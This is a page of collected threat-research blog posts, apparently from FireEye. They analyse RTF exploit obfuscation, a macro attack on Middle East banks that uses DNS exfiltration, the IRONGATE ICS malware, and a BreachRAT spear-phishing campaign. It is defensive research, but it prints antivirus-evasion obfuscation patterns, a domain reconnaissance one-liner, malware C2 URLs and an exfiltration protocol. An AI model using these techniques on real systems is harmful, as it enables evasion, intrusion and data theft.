Because pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, the malicious RTF targeting the Ambassador of India is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations – there were plenty of dummy symbols such as { } in the initial sample.

Figure 1. Obfuscated sample of CVE-2010-3333

As we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of sn be combined together, pieces of sv will be combined as well. The following example demonstrates this obfuscation:

Obfuscated

{rtf1{shp{sp{sn2 pF}{sn44 ragments}{sv 1;28}{sv ;fffffffffffff….}}}}

Clear

{rtf1{shp{sp{sn pFragments}{sv 1;28 ;fffffffffffff….}}}}

We can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.

Notice the mixed ‘x0D’ and ‘x0A’ – they are ‘r’ and ‘n’ and the RTF parser would simply ignore them.

2.     Embedded objects

Users can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It’s a bad practice because it cultivates poor habits in users.

Let’s take a glance at the embedded object syntax first:

<objtype> specifies the type of object. objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let’s take it as an example. The data right after objdata is OLE1 native data, defined as:

<data>

(binN #BDATA) | #SDATA

#BDATA

Binary data

#SDATA

Hexadecimal data

Attackers would try to insert various elements into the <data> to evade static signature detection. Let’s take a look at some examples to understand these tricks:

a.     For example, binN can be swapped with #SDATA. The data right after binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.

Obfuscated

{objectobjocxobjdata bin3 123}

Clear

{objectobjocxobjdata 313233}

Let’s look at another example:

Obfuscated

{objectobjocxobjdata bin41541544011100001100000000000000000000000000000000000000000003 123}

Clear

{objectobjocxobjdata 313233}

If we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.

This happens because bin takes a 32-bit signed integer numeric parameter. You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that’s is not the case. Microsoft Word’s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word’s RTF parser is implemented as follows:

b.     ucN and uN
Both of them are ignored, and the characters right after uN would not be skipped.

c.     The space characters: 0x0D (n), 0x0A (r), 0x09 (t) are ignored.

d.     Escaped characters
RTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:


{
%
+
-
\
'hh

All of those escaped characters are ignored, but there’s an interesting situation with ’hh. Let’s look into an example first:

Obfuscated

{objectobjocxobjdata 341’112345 }

Clear

{objectobjocxobjdata 342345}

When parsing ’11, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding ’11 has also been discarded. Once the RTF parser parses the 1 right before ’11, which is the higher 4-bit of an octet, and then immediately encounters ’11, the higher 4-bit would be discarded. That’s because the internal state for decoding the hex string to binary bytes has been reset.

The table below shows the processing procedure, the two 1s in the yellow rows are from ’11. It’s clear that the mixed ’11 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:

e.     Oversized control word and numeric parameter
The RTF specification says that a control word’s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn’t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.

In the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.

For the second obfuscated example, the total length of the “bin” control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.

f.     Additional techniques

The program uses the last objdata control word in a list, as shown here:

Obfuscated

{objectobjocxobjdata 554564{*objdata 4444}54545} OR

{objectobjocxobjdata 554445objdata 444454545}

{objectobjocx{{objdata 554445}{objdata 444454545}}}

Clear

{objectobjocxobjdata 444454545}

As we can see here, except for binN, other control words are ignored:

Obfuscated

{objectobjocxobjdata 44444444{par2211 5555}6666}       OR

{objectobjocxobjdata 44444444{datastore2211 5555}6666} OR

{objectobjocxobjdata 44444444datastore2211 55556666}   OR

{objectobjocxobjdata 44444444{unknown2211 5555}6666}   OR

{objectobjocxobjdata 44444444unknown2211 55556666}

 

Clear

{objectobjocxobjdata 4444444455556666}

There is another special case that makes the situation a bit more complicated. That is control symbol *. From RTF specification, we can get the description for this control symbol:

    Destinations added after the 1987 RTF Specification may be preceded by the control symbol * (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word.

Let’s take a look at how it can be used in obfuscations:

1.      

Obfuscated

{objectobjocxobjdata 44444444{*par314 5555}6666}

Clear

{objectobjocxobjdata 4444444455556666}

par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.

2.

Obfuscated

{objectobjocxobjdata 44444444{*datastore314 5555}6666}

Clear

{objectobjocxobjdata 444444446666}

RTF parser can also recognize datastore and understand that it can accept data, therefore the following data will be consumed by datastore.

3.

Obfuscated

{objectobjocxobjdata 44444444{*unknown314 5555}6666}

Clear

{objectobjocxobjdata 444444446666}

For an analyst, it’s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here’s the prototype of OleConvertOLESTREAMToIStorage:

The object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:

The last command .writemem writes a section of memory to d:evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.

Most of the obfuscation techniques of objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.

Conclusion

Our adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word.  They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.

Acknowledgements

Thanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.

Targeted Attacks against Banks in the Middle East

$
0
0
Introduction

In the first week of May 2016, FireEye’s DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region. The threat actors appear to be performing initial reconnaissance against would-be targets, and the attacks caught our attention since they were using unique scripts not commonly seen in crimeware campaigns.

In this blog we discuss in detail the tools, tactics, techniques and procedures (TTPs) used in these targeted attacks.

Delivery Method

The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East. The themes of the messages used in the attacks are related to IT Infrastructure such as a log of Server Status Report or a list of Cisco Iron Port Appliance details. In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks. This email was then forwarded to several people, with the malicious Excel file attached.

Macro Details

The macro first calls an Init() function (shown in Figure 1) that performs the following malicious activities:

  1. Extracts base64-encoded content from the cells within a worksheet titled "Incompatible".
  2. Checks for the presence of a file at the path %PUBLIC%\Libraries\ update.vbs. If the file is not present, the macro creates three different directories under %PUBLIC%\Libraries, namely up, dn, and tp.
  3. The extracted content from step one is decoded using PowerShell and dropped into two different files: %PUBLIC%\Libraries\update.vbs and %PUBLIC%\Libraries\dns.ps1
  4. The macro then creates a scheduled task with name: GoogleUpdateTaskMachineUI, which executes update.vbs every three minutes.

Note: Due to the use of a hardcoded environment variable %PUBLIC% in the macro code, the macro will only run successfully on Windows Vista and subsequent versions of the operating system.

Figure 1: Macro Init() subroutine

Run-time Unhiding of Content

One of the interesting techniques we observed in this attack was the display of additional content after the macro executed successfully. This was done for the purpose of social engineering – specifically, to convince the victim that enabling the macro did in fact result in the “unhiding” of additional spreadsheet data.

Office documents containing malicious macros are commonly used in crimeware campaigns. Because default Office settings typically require user action in order for macros to run, attackers may convince victims to enable risky macro code by telling them that the macro is required to view “protected content.”

In crimeware campaigns, we usually observe that no additional content is displayed after enabling the macros. However, in this case, attackers took the extra step to actually hide and unhide worksheets when the macro is enabled to allay any suspicion. A screenshot of the worksheet before and after running the macro is shown in Figure 2 and Figure 3, respectively.

Figure 2: Before unhiding of content

Figure 3: After unhiding of content

In the following code section, we can see that the subroutine ShowHideSheets() is called after the Init() subroutine executes completely:

Private Sub Workbook_Open()
    Call Init

        Call ShowHideSheets
End Sub

The code of subroutine ShowHideSheets(), which unhides the content after completion of malicious activities, is shown in Figure 4.

Figure 4: Macro used to unhide content at runtime

First Stage Download

After the macro successfully creates the scheduled task, the dropped VBScript, update.vbs (Figure 5), will be launched every three minutes. This VBScript performs the following operations:

  1. Leverages PowerShell to download content from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  2. Uses PowerShell to download a BAT file from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  3. Executes the BAT file and stores the results in a file in the path %PUBLIC%\Libraries\up.
  4. Uploads this file to the server by sending an HTTP POST request to the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u.
  5. Finally, it executes the PowerShell script dns.ps1, which is used for the purpose of data exfiltration using DNS.

Figure 5: Content of update.vbs

During our analysis, the VBScript downloaded a customized version of Mimikatz in the previously mentioned step one. The customized version uses its own default prompt string as well as its own console title, as shown in Figure 6.

Figure 6: Custom version of Mimikatz used to extract user password hashes

Similarly, the contents of the BAT file downloaded in step two are shown in Figure 7:

whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

Figure 7: Content of downloaded BAT script

This BAT file is used to collect important information from the system, including the currently logged on user, the hostname, network configuration data, user and group accounts, local and domain administrator accounts, running processes, and other data.

Data Exfiltration over DNS

Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel. This was likely done because DNS is required for normal network operations. The DNS protocol is unlikely to be blocked (allowing free communications out of the network) and its use is unlikely to raise suspicion among network defenders.

The script dns.ps1, dropped by the macro, is used for this purpose. In the following section, we describe its functionality in detail.

  1. The script requests an ID (through the DNS protocol) from go0gIe[.]com. This ID will then be saved into the PowerShell script.
  2. Next, the script queries the C2 server for additional instructions. If no further actions are requested, the script exits and will be activated again the next time update.vbs is called.
  3. If an action is required, the DNS server replies with an IP with the pattern 33.33.xx.yy. The script then proceeds to create a file at %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. The script then proceeds to make DNS requests to fetch more data. Each DNS request results in the C2 server returning an IP address. Each octet of the IP address is interpreted as the decimal representation of an ASCII character; for example, the decimal number 99 is equivalent to the ASCII character ‘c’. The characters represented by the octets of the IP address are appended to the batch file to construct a script. The C2 server signals the end of the data stream by replying to a DNS query with the IP address 35.35.35.35.
  4. Once the file has been successfully transferred, the BAT file will be run and its output saved as %PUBLIC%\Libraries\tp\chr(xx)chr(yy).txt.
  5. The text file containing the results of the BAT script will then be uploaded to the DNS server by embedding file data into part of the subdomain. The format of the DNS query used is shown in Table 1.
  6. The BAT file and the text file will then be deleted. The script then quits, to be invoked again upon running the next scheduled task.

The DNS communication portion of the script is shown in Figure 8, along with a table showing the various subdomain formats being generated by the script.

Figure 8: Code Snippet of dns.ps1

Format of subdomains used in DNS C2 protocol:

Subdomain used to request for BotID, used in step 2 above

[00][botid]00000[base36 random number]30

Subdomain used while performing file transfers used in step 3 above

[00][botid]00000[base36 random number]232A[hex_filename][i-counter]

Subdomain used while performing file upload, used in step 5 above

[00][botid][cmdid][partid][base36 random number][48-hex-char-of-file-content]

Table 1: C2 Protocol Format

Conclusion

Although this attack did not leverage any zero-days or other advanced techniques, it was interesting to see how attackers used different components to perform reconnaissance activities on a specific target.

This attack also demonstrates that macro malware is effective even today. Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

IRONGATE ICS Malware: Nothing to See Here…Masking Malicious Activity on SCADA Systems

$
0
0

In the latter half of 2015, the FireEye Labs Advanced Reverse Engineering (FLARE) team identified several versions of an ICS-focused malware crafted to manipulate a specific industrial process running within a simulated Siemens control system environment. We named this family of malware IRONGATE.

FLARE found the samples on VirusTotal while researching droppers compiled with PyInstaller — an approach used by numerous malicious actors. The IRONGATE samples stood out based on their references to SCADA and associated functionality. Two samples of the malware payload were uploaded by different sources in 2014, but none of the antivirus vendors featured on VirusTotal flagged them as malicious.

Siemens Product Computer Emergency Readiness Team (ProductCERT) confirmed that IRONGATE is not viable against operational Siemens control systems and determined that IRONGATE does not exploit any vulnerabilities in Siemens products. We are unable to associate IRONGATE with any campaigns or threat actors. We acknowledge that IRONGATE could be a test case, proof of concept, or research activity for ICS attack techniques.

Our analysis finds that IRONGATE invokes ICS attack concepts first seen in Stuxnet, but in a simulation environment. Because the body of industrial control systems (ICS) and supervisory control and data acquisition (SCADA) malware is limited, we are sharing details with the broader community.

Malicious Concepts

Deceptive Man-in-the-Middle

IRONGATE's key feature is a man-in-the-middle (MitM) attack against process input-output (IO) and process operator software within industrial process simulation. The malware replaces a Dynamic Link Library (DLL) with a malicious DLL, which then acts as a broker between a PLC and the legitimate monitoring software. This malicious DLL records five seconds of 'normal' traffic from a PLC to the user interface and replays it, while sending different data back to the PLC. This could allow an attacker to alter a controlled process unbeknownst to process operators.

Sandbox Evasion

IRONGATE's second notable feature involves sandbox evasion. Some droppers for the IRONGATE malware would not run if VMware or Cuckoo Sandbox environments were employed. The malware uses these techniques to avoid detection and resist analysis, and developing these anti-sandbox techniques indicates that the author wanted the code to resist casual analysis attempts. It also implies that IRONGATE’s purpose was malicious, as opposed to a tool written for other legitimate purposes.

Dropper Observables

We first identified IRONGATE when investigating droppers compiled with PyInstaller — an approach used by numerous malicious actors. In addition, strings found in the dropper include the word “payload”, which is commonly associated with malware.

Unique Features for ICS Malware

While IRONGATE malware does not compare to Stuxnet in terms of complexity, ability to propagate, or geopolitical implications, IRONGATE leverages some of the same features and techniques Stuxtnet used to attack centrifuge rotor speeds at the Natanz uranium enrichment facility; it also demonstrates new features for ICS malware.

  • Both pieces of malware look for a single, highly specific process.
  • Both replace DLLs to achieve process manipulation.
  • IRONGATE detects malware detonation/observation environments, whereas Stuxnet looked for the presence of antivirus software.
  • IRONGATE actively records and plays back process data to hide manipulations, whereas Stuxnet did not attempt to hide its process manipulation, but suspended normal operation of the S7-315 so even if rotor speed had been displayed on the HMI, the data would have been static.

A Proof of Concept

IRONGATE’s characteristics lead us to conclude that it is a test, proof of concept, or research activity.

  • The code is specifically crafted to look for a user-created DLL communicating with the Siemens PLCSIM environment. PLCSIM is used to test PLC program functionality prior to in-field deployment. The DLLs that IRONGATE seeks and replaces are not part of the Siemens standard product set, but communicate with the S7ProSim COM object. Malware authors test concepts using commercial simulation software.
  • Code in the malicious software closely matched usage on a control engineering blog dealing with PLCSIM (https://alexsentcha.wordpress.com/using-s7-prosim-with-siemens-s7-plcsim/ and https://pcplcdemos.googlecode.com/hg/S7PROSIM/BioGas/S7%20v5.5/).
  • While we have identified and analyzed several droppers for the IRONGATE malware, we have yet to identify the code’s infection vector.
  • In addition, our analysis did not identify what triggers the MitM payload to install; the scada.exe binary that deploys the IRONGATE DLL payload appears to require manual execution.
  • We have not identified any other instances of the ICS-specific IRONGATE components (scada.exe and Step7ProSim.dll), despite their having been compiled in September of 2014.
  • Siemens ProductCERT has confirmed that the code would not work against a standard Siemens control system environment.

Implications for ICS Asset Owners

Even though process operators face no increased risk from the currently identified members of the IRONGATE malware family, IRONGATE provides valuable insight into adversary mindset.

Network security monitoring, indicator of compromise (IoC) matching, and good practice guidance from vendors and other stakeholders represent important defensive techniques for ICS networks.

To specifically counter IRONGATE’s process attack techniques, ICS asset owners may, over the longer term, implement solutions that:

  • Require integrity checks and code signing for vendor and user generated code. Lacking cryptographic verification facilitates file replacement and MitM attacks against controlled industrial processes.
  • Develop mechanisms for sanity checking IO data, such as independent sensing and backhaul, and comparison with expected process state information. Ignorance of expected process state facilitates an attacker’s ability to achieve physical consequence without alarming operators.

Technical Malware Analysis

IRONGATE Dropper Family

FireEye has identified six IRONGATE droppers: bla.exe, update.exe1, update_no_pipe.exe1, update_no_pipe.exe2, update_no_pipe.exe2,update.exe3. All but one of these Python-based droppers first checks for execution in a VMware or Cuckoo Sandbox environment. If found, the malware exits.

If not found, the IRONGATE dropper extracts a UPX-packed, publicly available utility (NirSoft NetResView version 1.27) to audiodg.exe in the same directory as the dropper. The dropper then executes the utility using the command audiodg.exe /scomma scxrt2.ini. This command populates the file scxrt2.ini with a comma-separated list of network resources identified by the host system.

The dropper iterates through each entry in scxrt2.ini, looking for paths named move-to-operational or move-to-operational.lnk. If a path is found, the dropper first extracts the Base64-encoded .NET executable scada.exe to the current directory and then moves the file to the path containing move-to-operational or move-to-operational.lnk. The path move-to-operational is interesting as well, perhaps implying that IRONGATE was not seeking the actual running process, but rather a staging area for code promotion. The dropper does not execute the scada.exe payload after moving it.

Anti-Analysis Techniques

Each IRONGATE dropper currently identified deploys the same .NET payload, scada.exe. All but one of the droppers incorporated anti-detection/analysis techniques to identify execution in VMware or the Cuckoo Sandbox. If such environments are detected, the dropper will not deploy the .NET executable (scada.exe) to the host.

Four of the droppers (update.exe1, update_no_pipe.exe1, update_no_pipe.exe2, and update.exe3) detect Cuckoo environments by scanning subdirectories of the %SystemDrive%. Directories with names greater than five, but fewer than ten characters are inspected for the subdirectories drop, files, logs, memory, and shots. If a matching directory is found, the dropper does not attempt to deploy the scada.exe payload.

The update.exe1 and update.exe3 droppers contain code for an additional Cuckoo check using the SysInternals pipelist program, install.exe, but the code is disabled in each.

The update.exe2 dropper includes a check for VMware instead of Cuckoo. The VMWare check looks for the registry key HKLMSOFTWAREVMware, Inc.VMware Tools and the files %WINDIR%system32driversvmmouse.sys and %WINDIR%system32driversvmhgfs.sys. If any of these are found, the dropper does not attempt to deploy the scada.exe payload.

The dropper bla.exe does not include an environment check for either Cuckoo or VMware.

scada.exe Payload

We surmise that scada.exe is a user-created payload used for testing the malware. First, our analysis did not indicate what triggers scada.exe to run. Second, Siemens ProductCERT informed us that scada.exe is not a default file name associated with Siemens industrial control software.

When scada.exe executes, it scans drives attached to the system for filenames ending in Step7ProSim.dll. According to the Siemens ProductCERT, Step7ProSim.dll is not part of the Siemens PLCSIM software. We were unable to determine whether this DLL was created specifically by the malware author, or if it was from another source, such as example code or a particular custom ICS implementation. We surmise this DLL simulates generation of IO values, which would normally be provided by an S7-based controller, since the functions it includes appear derived from the Siemens PLCSIM environment.

If scada.exe finds a matching DLL file name, it kills all running processes with the name biogas.exe. The malware then moves Step7ProSim.dll to Step7ConMgr.dll and drops a malicious Step7ProSim.dll – the IRONGATE payload – to the same directory.

The malicious Step7ProSim.dll acts as an API proxy between the original user-created Step7ProSim.dll (now named Step7ConMgr.dll) and the application biogas.exe that loads it. Five seconds after loading, the malicious Step7ProSim.dll records five seconds of calls to ReadDataBlockValue. All future calls to ReadDataBlockValue return the recorded data.

Simultaneously, the malicious DLL discards all calls to WriteDataBlockValue and instead calls WriteInputPoint(0x110, 0, 0x7763) and WriteInputPoint(0x114, 0, 0x7763) every millisecond. All of these functions are named similarly to Siemens S7ProSim v5.4 COM interface. It appears that other calls to API functions are passed through the malicious DLL to the legitimate DLL with no other modification.

Biogas.exe

As mentioned previously, IRONGATE seeks to manipulate code similar to that found on a blog dealing with simulating PLC communications using PLCSIM, including the use of an executable named biogas.exe.

Examination of the executable from that blog’s demo code shows that the WriteInputPoint function calls with byte indices 0x110 and 0x114 set pressure and temperature values, respectively:

IRONGATE:

         WriteInputPoint(0x110, 0, 0x7763)
WriteInputPoint(0x114, 0, 0x7763)

 Equivalent pseudo code from Biogas.exe: 

        S7ProSim.WriteInputPoint(0x110, 0, (short)this.Pressure.Value)
     S7ProSim.WriteInputPoint(0x114, 0, (short)this.Temperature.Value)

We have been unable to determine the significance of the hardcoded value 0x7763, which is passed in both instances of the write function.

Because of the noted indications that IRONGATE is a proof of concept, we cannot conclude IRONGATE’s author intends to manipulate specific temperature or pressure values associated with the specific biogas.exe process, but find the similarities to this example code striking.

Artifacts and Indicators

PyInstaller Artifacts

The IRONGATE droppers are Python scripts converted to executables using PyInstaller. The compiled droppers contain PyInstaller artifacts from the system the executables were created on. These artifacts may link other samples compiled on the same system. Five of the six file droppers (bla.exe, update.exe1, update_no_pipe.exe1, update_no_pipe.exe2 and update.exe3) all share the same PyInstaller artifacts listed in Table 1.

Table 1: Pyinstaller Artifacts

The remaining dropper, update.exe2, contains the artifacts listed in Table 2.

Table 2: Pyinstaller Artifacts for update.exe2

Unique Strings

Figure 1 and 2 list the unique strings discovered in the scada.exe and Step7ProSim.dll binaries.

Figure 1: Scada.exe Unique Strings

Figure 2: Step7ProSim.dll Unique Strings

File Hashes

Table 3 contains the MD5 hashes, file and architecture type, and compile times for the malware analyzed in this report.

Table 3: File MD5 Hashes and Compile Times

FireEye detects IRONGATE. A list of indicators can be found here.

Special thanks to the Siemens ProductCERT for providing support and context to this investigation.

APT Group Sends Spear Phishing Emails to Indian Government Officials

$
0
0

Introduction
On May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.

This group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call Transparent Tribe, in a March blog post.

In this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government’s 7th Central Pay Commission (CPC). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.

Malware Delivery Method
In all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload.

In previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.

The email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.


Figure 1: Contents of the Email

A review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.

Exploit Analysis
Despite being an older vulnerability, many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.


Figure 2: Exploit Shellcode used to Locate and Decode Payload

The shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:

Lastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces’ pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.


Figure 3: Decoy Document related to 7th Pay Commission

 

The decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user “Bhopal”.


Figure 4: Metadata of the Document

The payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.

The following is a brief summary of the activities performed by the dropped payload:

1. Decrypts resource 1337 using a hard-coded 14-byte key "MjEh92jHaZZOl3". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:


Figure 5: Encryption/ Decryption Function

  • Generate an array of integers from 0x00 to 0xff
  • Scrambles the state of the table using the given key
  • Encrypts or decrypts a string using the scrambled table from (b).
  • A python script, which can be used for decrypting this resource, is provided in the appendix below.

2. The decrypted resource contains the C2 server’s IP address as well as the mutex name.

3. If the mutex does not exist and a Windows Startup Registry key with name “System Update” does not exist, the malware performs its initialization routine by:

  • Copying itself to the path %PROGRAMDATA%\svchost.exe
  • Sets the Windows Startup Registry key with the name “System Update” which points to the above dropped payload.

4. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.

5. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.

6. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key “AjN28AcMaNX”.

7. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:

Conclusion
As with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.

Appendix

Encryption / Decryption algorithm translated into Python

Viewing all 138 articles
Browse latest View live